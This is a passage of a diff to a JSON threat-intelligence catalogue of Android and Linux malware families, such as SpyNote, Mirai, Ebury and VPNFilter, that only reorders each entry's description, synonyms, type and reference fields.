"https://www.fireeye.com/blog/threat-research/2015/12/slembunk_an_evolvin.html" - ] + ], + "synonyms": [ + "SlemBunk" + ], + "type": [] }, "uuid": "d87e2574-7b9c-4ea7-98eb-88f3e139f6ff", - "value": "Slempo", - "description": "" + "value": "Slempo" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.slocker", "https://blog.trendmicro.com/trendlabs-security-intelligence/slocker-mobile-ransomware-starts-mimicking-wannacry/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "fe187c8a-25d4-4d30-bd43-efca18d527f0", - "value": "Slocker", - "description": "" + "value": "Slocker" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.smsspy" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "7a38c552-0e1a-4980-8d62-1aa38617efab", - "value": "SMSspy", - "description": "" + "value": "SMSspy" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.spybanker", "https://news.drweb.com/show/?i=11104&lng=en", "http://www.welivesecurity.com/2017/02/23/released-android-malware-source-code-used-run-banking-botnet/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "e186384b-8001-4cdd-b170-1548deb8bf04", - "value": "SpyBanker", - "description": "" + "value": "SpyBanker" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.spynote", "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.hcd1wvpsrgfr" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "31592c69-d540-4617-8253-71ae0c45526c", - "value": "SpyNote", - "description": "" + "value": "SpyNote" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.stealthagent", "https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "0777cb30-534f-44bb-a7af-906a422bd624", - "value": "StealthAgent", - "description": "" + "value": "StealthAgent" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.stealthmango", "https://www.lookout.com/info/stealth-mango-report-ty" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "7d480f11-3de8-463d-8a19-54685c8b9e0f", - "value": "Stealth Mango", - "description": "" + "value": "Stealth Mango" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.svpeng", "https://securelist.com/a-new-era-in-mobile-banking-trojans/79198/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "d99c0a47-9d61-4d92-86ec-86a87b060d76", - "value": "Svpeng", - "description": "" + "value": "Svpeng" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.switcher", "https://securelist.com/blog/mobile/76969/switcher-android-joins-the-attack-the-router-club/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "e3e90666-bc19-4741-aca8-1e4cbc2f4c9e", - "value": "Switcher", - "description": "" + "value": "Switcher" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.telerat", "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "e1600d04-d2f7-4862-8bbc-0f038ea683ea", - "value": "TeleRAT", - "description": "" + "value": "TeleRAT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.tempting_cedar", "https://blog.avast.com/avast-tracks-down-tempting-cedar-spyware" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "982c3554-1df2-4062-8f32-f311940ad9ff", - "value": "TemptingCedar Spyware", - "description": "" + "value": "TemptingCedar Spyware" }, { + "description": "", "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.tinyz", + "http://blog.group-ib.com/cron" + ], "synonyms": [ "Catelites Android Bot", "MarsElite Android Bot" ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.tinyz", - "http://blog.group-ib.com/cron" - ] + "type": [] }, "uuid": "93b27a50-f9b7-4ab6-bb9f-70a4b914eec3", - "value": "TinyZ", - "description": "" + "value": "TinyZ" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.titan", "https://blog.lookout.com/titan-mobile-threat", "https://www.alienvault.com/blogs/labs-research/delivery-keyboy" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "7d418da3-d9d2-4005-8cc7-7677d1b11327", - "value": "Titan", - "description": "" + "value": "Titan" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.triada", "https://www.nowsecure.com/blog/2016/11/21/android-malware-analysis-radare-triada-trojan/", @@ -757,138 +759,146 @@ "https://securelist.com/everyone-sees-not-what-they-want-to-see/74997/", "https://securelist.com/attack-on-zygote-a-new-twist-in-the-evolution-of-mobile-threats/74032/", "https://blog.checkpoint.com/2016/06/17/in-the-wild-mobile-malware-implements-new-features/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "fa5fdfd2-8142-43f5-9b48-d1033b5398c8", - "value": "Triada", - "description": "" + "value": "Triada" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_001", "https://twitter.com/illegalFawn/status/826775250583035904" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "bbd5a32e-a080-4f16-98ea-ad8863507aa6", - "value": "Unidentified APK 001", - "description": "" + "value": "Unidentified APK 001" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_002" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "afb6a7cc-4185-4f19-8ad4-45dcbb76e544", - "value": "Unidentified APK 002", - "description": "" + "value": "Unidentified APK 002" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.viper_rat", "https://securelist.com/blog/incidents/77562/breaking-the-weakest-link-of-the-strongest-chain/", "https://blog.lookout.com/blog/2017/02/16/viperrat-mobile-apt/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "3482f5fe-f129-4c77-ae98-76e25f6086b9", - "value": "Viper RAT", - "description": "" + "value": "Viper RAT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.wirex", "https://www.flashpoint-intel.com/blog/wirex-botnet-industry-collaboration/", "https://krebsonsecurity.com/2017/08/tech-firms-team-up-to-take-down-wirex-android-ddos-botnet/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "77f2254c-9886-4eed-a7c3-bbcef4a97d46", - "value": "WireX", - "description": "" + "value": "WireX" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.xbot", "https://researchcenter.paloaltonetworks.com/2016/02/new-android-trojan-xbot-phishes-credit-cards-and-bank-accounts-encrypts-devices-for-ransom/", "https://blog.avast.com/2015/02/17/angry-android-hacker-hides-xbot-malware-in-popular-application-icons/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "4cfa42a3-71d9-43e2-bf23-daa79f326387", - "value": "Xbot", - "description": "" + "value": "Xbot" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.xrat", "https://blog.lookout.com/xrat-mobile-threat" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "a8f167a8-30b9-4953-8eb6-247f0d046d32", - "value": "XRat", - "description": "" + "value": "XRat" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.zoopark", "https://securelist.com/whos-who-in-the-zoo/85394", "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/03114450/ZooPark_for_public_final_edit.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b1fc66de-fda7-4f0c-af00-751d334444b3", - "value": "ZooPark", - "description": "" + "value": "ZooPark" }, { + "description": "", "meta": { - "synonyms": [ - "Qysly" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.ztorg", "https://blog.fortinet.com/2017/03/15/teardown-of-a-recent-variant-of-android-ztorg-part-1", "http://blog.fortinet.com/2017/03/08/teardown-of-android-ztorg-part-2", "https://securelist.com/ztorg-from-rooting-to-sms/78775/" - ] + ], + "synonyms": [ + "Qysly" + ], + "type": [] }, "uuid": "9fbf97c0-d87a-47b0-a511-0147a58b5202", - "value": "Ztorg", - "description": "" + "value": "Ztorg" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.backdoor_irc16", "https://news.drweb.com/show/?c=5&i=10193&lng=en" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "3008fa01-492a-42e2-ab9b-a0a9d12823b8", - "value": "Irc16", - "description": "" + "value": "Irc16" }, { + "description": "", "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite", + "http://blog.trendmicro.com/trendlabs-security-intelligence/bashlite-affects-devices-running-on-busybox/", + "https://krebsonsecurity.com/2016/09/krebsonsecurity-hit-with-record-ddos/", + "https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf" + ], "synonyms": [ "gayfgt", "Gafgyt", @@ -896,24 +906,14 @@ "torlus", "lizkebab" ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite", - "http://blog.trendmicro.com/trendlabs-security-intelligence/bashlite-affects-devices-running-on-busybox/", - "https://krebsonsecurity.com/2016/09/krebsonsecurity-hit-with-record-ddos/", - "https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf" - ] + "type": [] }, "uuid": "81917a93-6a70-4334-afe2-56904c1fafe9", - "value": "Bashlite", - "description": "" + "value": "Bashlite" }, { + "description": "This is in the same family as eBury, Calfbot, and is also likely related to DarkLeech", "meta": { - "synonyms": [ - "CDorked.A" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.cdorked", "https://www.symantec.com/security-center/writeup/2013-050214-5501-99", @@ -921,85 +921,87 @@ "https://www.welivesecurity.com/2013/05/02/the-stealthiness-of-linuxcdorked-a-clarification/", "https://www.welivesecurity.com/2013/04/26/linuxcdorked-new-apache-backdoor-in-the-wild-serves-blackhole/", "https://blog.sucuri.net/2014/03/windigo-linux-analysis-ebury-and-cdorked.html" - ] + ], + "synonyms": [ + "CDorked.A" + ], + "type": [] }, "uuid": "bb9eaaec-97c9-4014-94dd-129cecf31ff0", - "value": "CDorked", - "description": "This is in the same family as eBury, Calfbot, and is also likely related to DarkLeech" + "value": "CDorked" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.chapro", "http://contagiodump.blogspot.com/2012/12/dec-2012-linuxchapro-trojan-apache.html", "http://blog.eset.com/2012/12/18/malicious-apache-module-used-for-content-injection-linuxchapro-a" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "700366d8-4036-4e48-9a5f-bd6e09fb9b6b", - "value": "Chapro", - "description": "" + "value": "Chapro" }, { + "description": "This was observed to be pushed by IoT malware, abusing devices for LiteCoin and BitCoin mining.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.cpuminer", "https://github.com/pooler/cpuminer" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "8a42a699-1746-498b-a558-e7113bb916c0", - "value": "Cpuminer", - "description": "This was observed to be pushed by IoT malware, abusing devices for LiteCoin and BitCoin mining." + "value": "Cpuminer" }, { + "description": "This payload has been used to compromise kernel.org back in August of 2011 and has hit cPanel Support which in turn, has infected quite a few cPanel servers. It is a credential stealing payload which steals SSH keys, passwords, and potentially other credentials.\r\n\r\nThis family is part of a wider range of tools which are described in detail in the operation windigo whitepaper by ESET.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.ebury", "https://www.justice.gov/opa/pr/russian-citizen-pleads-guilty-involvement-global-botnet-conspiracy", "https://www.welivesecurity.com/wp-content/uploads/2014/03/operation_windigo.pdf", "https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/", "https://www.welivesecurity.com/2017/10/30/windigo-ebury-update-2/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "ce79265c-a467-4a17-b27d-7ec7954688d5", - "value": "Ebury", - "description": "This payload has been used to compromise kernel.org back in August of 2011 and has hit cPanel Support which in turn, has infected quite a few cPanel servers. It is a credential stealing payload which steals SSH keys, passwords, and potentially other credentials.\r\n\r\nThis family is part of a wider range of tools which are described in detail in the operation windigo whitepaper by ESET." + "value": "Ebury" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.erebus", "https://blog.trendmicro.com/trendlabs-security-intelligence/erebus-resurfaces-as-linux-ransomware/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "479353aa-c6d7-47a7-b5f0-3f97fd904864", - "value": "Erebus", - "description": "" + "value": "Erebus" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.ext4", "https://www.recordedfuture.com/chinese-cyberespionage-operations/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "79b2b3c0-6119-4511-9c33-2a48532b6a60", - "value": "ext4", - "description": "" + "value": "ext4" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hajime", "https://security.rapiditynetworks.com/publications/2016-10-16/hajime.pdf", @@ -1010,31 +1012,29 @@ "https://security.radware.com/WorkArea/DownloadAsset.aspx?id=1461", "https://blog.netlab.360.com/quick-summary-port-8291-scan-en/", "https://github.com/Psychotropos/hajime_hashes" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "ff8ee85f-4175-4f5a-99e5-0cbc378f1489", - "value": "Hajime", - "description": "" + "value": "Hajime" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hakai", "https://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "0839c28a-ea11-44d4-93d1-24b246ef6743", - "value": "Hakai", - "description": "" + "value": "Hakai" }, { + "description": "", "meta": { - "synonyms": [ - "HNS" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hideandseek", "https://labs.bitdefender.com/2018/01/new-hide-n-seek-iot-botnet-using-custom-built-peer-to-peer-communication-spotted-in-the-wild/", @@ -1043,89 +1043,91 @@ "https://www.bleepingcomputer.com/news/security/new-hns-iot-botnet-has-already-amassed-14k-bots/", "https://www.bleepingcomputer.com/news/security/hns-evolves-from-iot-to-cross-platform-botnet/", "https://blog.netlab.360.com/hns-botnet-recent-activities-en/" - ] + ], + "synonyms": [ + "HNS" + ], + "type": [] }, "uuid": "41bf8f3e-bb6a-445d-bb74-d08aae61a94b", - "value": "Hide and Seek", - "description": "" + "value": "Hide and Seek" }, { + "description": "", "meta": { - "synonyms": [ - "IoTroop", - "Reaper" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.iot_reaper", "https://research.checkpoint.com/new-iot-botnet-storm-coming/", "http://blog.netlab.360.com/iot_reaper-a-rappid-spreading-new-iot-botnet-en/", "https://krebsonsecurity.com/2017/10/reaper-calm-before-the-iot-security-storm", "https://embedi.com/blog/grim-iot-reaper-1-and-0-day-vulnerabilities-at-the-service-of-botnets/" - ] + ], + "synonyms": [ + "IoTroop", + "Reaper" + ], + "type": [] }, "uuid": "37c357a1-ec09-449f-b5a9-c1ef1fba2de2", - "value": "IoT Reaper", - "description": "" + "value": "IoT Reaper" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.jenx", "https://blog.radware.com/security/2018/02/jenx-los-calvos-de-san-calvicie/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "6a4365fc-8448-4270-ba93-0341788d004b", - "value": "JenX", - "description": "" + "value": "JenX" }, { + "description": "", "meta": { - "synonyms": [ - "STD" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.kaiten", "https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/kaiten-std-router-ddos-malware-threat-advisory.pdf" - ] + ], + "synonyms": [ + "STD" + ], + "type": [] }, "uuid": "9b618703-58f6-4f0b-83a4-d4f13e2e5d12", - "value": "Kaiten", - "description": "" + "value": "Kaiten" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.lady", "https://news.drweb.com/news/?i=10140&lng=en" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "f8b91c34-b4f0-4ef2-b9fb-15bd5ec0a66d", - "value": "Lady", - "description": "" + "value": "Lady" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mikey", "http://www.morphick.com/resources/lab-blog/mikey-linux-keylogger" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "aae3b83d-a116-4ebc-aae0-f6327ef174ea", - "value": "MiKey", - "description": "" + "value": "MiKey" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai", "https://www.bleepingcomputer.com/news/security/mirai-activity-picks-up-once-more-after-publication-of-poc-exploit-code/", @@ -1137,57 +1139,57 @@ "https://github.com/jgamblin/Mirai-Source-Code", "http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/", "https://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "17e12216-a303-4a00-8283-d3fe92d0934c", - "value": "Mirai", - "description": "" + "value": "Mirai" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mokes", "https://securelist.com/from-linux-to-windows-new-family-of-cross-platform-desktop-backdoors-discovered/73503/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "6d5a5357-4126-4950-b8c3-ee78b1172217", - "value": "Mokes", - "description": "" + "value": "Mokes" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.moose", "http://www.welivesecurity.com/2015/05/26/moose-router-worm/", "http://www.welivesecurity.com/2016/11/02/linuxmoose-still-breathing/", "http://gosecure.net/2016/11/02/exposing-the-ego-market-the-cybercrime-performed-by-the-linux-moose-botnet/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "7fdb91ea-52dc-499c-81f9-3dd824e2caa0", - "value": "Moose", - "description": "" + "value": "Moose" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mrblack", "https://news.drweb.com/?i=5760&c=23&lng=en" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "fc047e32-9cf2-4a92-861a-be882efd8a50", - "value": "MrBlack", - "description": "" + "value": "MrBlack" }, { + "description": "Mirai variant by actor \"Anarchy\" that used CVE-2017-17215 in July 2018 to compromise 18,000+ devices.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.owari", "https://www.bleepingcomputer.com/news/security/router-crapfest-malware-author-builds-18-000-strong-botnet-in-a-day/", @@ -1197,84 +1199,84 @@ "https://blog.newskysecurity.com/understanding-the-iot-hacker-a-conversation-with-owari-sora-iot-botnet-author-117feff56863", "https://www.fortinet.com/blog/threat-research/a-wicked-family-of-bots.html", "https://www.scmagazine.com/malware-author-anarchy-builds-18000-strong-huawei-router-botnet/article/782395/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "ec67f206-6464-48cf-a012-3cdfc1278488", - "value": "Owari", - "description": "Mirai variant by actor \"Anarchy\" that used CVE-2017-17215 in July 2018 to compromise 18,000+ devices." + "value": "Owari" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.penquin_turla", "https://securelist.com/files/2017/04/Penquins_Moonlit_Maze_PDF_eng.pdf", "https://securelist.com/files/2017/04/Penquins_Moonlit_Maze_AppendixB.pdf", "https://twitter.com/juanandres_gs/status/944741575837528064" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "262e0cf2-2fed-4d37-8d7a-0fd62c712840", - "value": "Penquin Turla", - "description": "" + "value": "Penquin Turla" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.persirai", "http://blog.trendmicro.com/trendlabs-security-intelligence/persirai-new-internet-things-iot-botnet-targets-ip-cameras/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "2ee05352-3d4a-448b-825d-9d6c10792bf7", - "value": "Persirai", - "description": "" + "value": "Persirai" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.r2r2", "https://www.guardicore.com/2018/06/operation-prowli-traffic-manipulation-cryptocurrency-mining/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "759f8590-a049-4c14-be8a-e6605e2cd43d", - "value": "r2r2", - "description": "" + "value": "r2r2" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.rakos", "http://www.welivesecurity.com/2016/12/20/new-linuxrakos-threat-devices-servers-ssh-scan/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "4592384c-48a7-4e16-b492-7add50a7d2f5", - "value": "Rakos", - "description": "" + "value": "Rakos" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.rex", "https://thisissecurity.net/2016/10/28/octopus-rex-evolution-of-a-multi-task-botnet/", "https://rednaga.io/2016/09/21/reversing_go_binaries_like_a_pro/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "49639ff5-e0be-4b6a-850b-d5d8dd37e62b", - "value": "Rex", - "description": "" + "value": "Rex" }, { + "description": "Satori is a variation of elf.mirai which was first detected around 2017-11-27 by 360 Netlab. It uses exploit to exhibit worm-like behaviour to spread over ports 37215 and 52869 (CVE-2014-8361).", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.satori", "http://blog.netlab.360.com/warning-satori-a-new-mirai-variant-is-spreading-in-worm-style-on-port-37215-and-52869-en/", @@ -1283,153 +1285,153 @@ "https://www.arbornetworks.com/blog/asert/the-arc-of-satori/", "https://blog.radware.com/security/botnets/2018/02/new-satori-botnet-variant-enslaves-thousands-dasan-wifi-routers/", "https://krebsonsecurity.com/2018/09/alleged-satori-iot-botnet-operator-sought-media-spotlight-got-indicted/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "9e5d83a8-1181-43fe-a77f-28c8c75ffbd0", - "value": "Satori", - "description": "Satori is a variation of elf.mirai which was first detected around 2017-11-27 by 360 Netlab. It uses exploit to exhibit worm-like behaviour to spread over ports 37215 and 52869 (CVE-2014-8361)." + "value": "Satori" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.shellbind", "http://blog.trendmicro.com/trendlabs-security-intelligence/linux-users-urged-update-new-threat-exploits-sambacry" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b51caf06-736e-46fc-9b13-48b0b81df4b7", - "value": "ShellBind", - "description": "" + "value": "ShellBind" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.shishiga", "https://www.welivesecurity.com/2017/04/25/linux-shishiga-malware-using-lua-scripts/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "51da734c-70dd-4337-ab08-ab61457e0da5", - "value": "Shishiga", - "description": "" + "value": "Shishiga" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.spamtorte", "http://cyber.verint.com/resource/spamtorte-v2-investigating-a-multi-layered-spam-botnet/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "7b9a9ea0-04d2-42ef-b72f-9d6476b9e0d0", - "value": "Spamtorte", - "description": "" + "value": "Spamtorte" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.sshdoor", "http://contagiodump.blogspot.com/2013/02/linux-sshdoor-sample.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "275d65b9-0894-4c9b-a255-83daddb2589c", - "value": "SSHDoor", - "description": "" + "value": "SSHDoor" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.stantinko", "https://www.welivesecurity.com/2017/07/20/stantinko-massive-adware-campaign-operating-covertly-since-2012/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "e8c131df-ee3b-41d4-992d-71d3090d2d98", - "value": "Stantinko", - "description": "" + "value": "Stantinko" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.torii", "https://blog.avast.com/new-torii-botnet-threat-research" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "a874575e-0ad7-464d-abb6-8f4b7964aa92", - "value": "Torii", - "description": "" + "value": "Torii" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.trump_bot", "http://paper.seebug.org/345/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "feb6a5f6-32f9-447d-af9c-08e499457883", - "value": "Trump Bot", - "description": "" + "value": "Trump Bot" }, { + "description": "", "meta": { - "synonyms": [ - "Amnesia", - "Radiation" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.tsunami", "https://www.8ackprotect.com/blog/big_brother_is_attacking_you", "http://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/", "http://get.cyberx-labs.com/radiation-report" - ] + ], + "synonyms": [ + "Amnesia", + "Radiation" + ], + "type": [] }, "uuid": "21540126-d0bb-42ce-9b93-341fedb94cac", - "value": "Tsunami", - "description": "" + "value": "Tsunami" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.turla_rat" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "1b62a421-c0db-4425-bcb2-a4925d5d33e0", - "value": "Turla RAT", - "description": "" + "value": "Turla RAT" }, { + "description": "", "meta": { - "synonyms": [ - "Espeon" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.umbreon", "http://blog.trendmicro.com/trendlabs-security-intelligence/pokemon-themed-umbreon-linux-rootkit-hits-x86-arm-systems/", "http://contagiodump.blogspot.com/2018/03/rootkit-umbreon-umreon-x86-arm-samples.html" - ] + ], + "synonyms": [ + "Espeon" + ], + "type": [] }, "uuid": "637000f7-4363-44e0-b795-9cfb7a3dc460", - "value": "Umbreon", - "description": "" + "value": "Umbreon" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.vpnfilter", "https://blog.talosintelligence.com/2018/06/vpnfilter-update.html?m=1", @@ -1440,46 +1442,42 @@ "https://blog.talosintelligence.com/2018/05/VPNFilter.html", "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophos-VPN-Filter-analysis-v2.pdf?la=en", "https://www.symantec.com/blogs/threat-intelligence/vpnfilter-iot-malware" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "5ad30da2-2645-4893-acd9-3f8e0fbb5500", - "value": "elf.vpnfilter", - "description": "" + "value": "elf.vpnfilter" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.wellmess" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b0046a6e-3b8b-45ad-a357-dabc46aba7de", - "value": "elf.wellmess", - "description": "" + "value": "elf.wellmess" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.wirenet", "http://contagiodump.blogspot.com/2012/12/aug-2012-backdoorwirenet-osx-and-linux.html", "https://news.drweb.com/show/?i=2679&lng=en&c=14" - ] + ], + "synonyms": [], + "type": [] }, 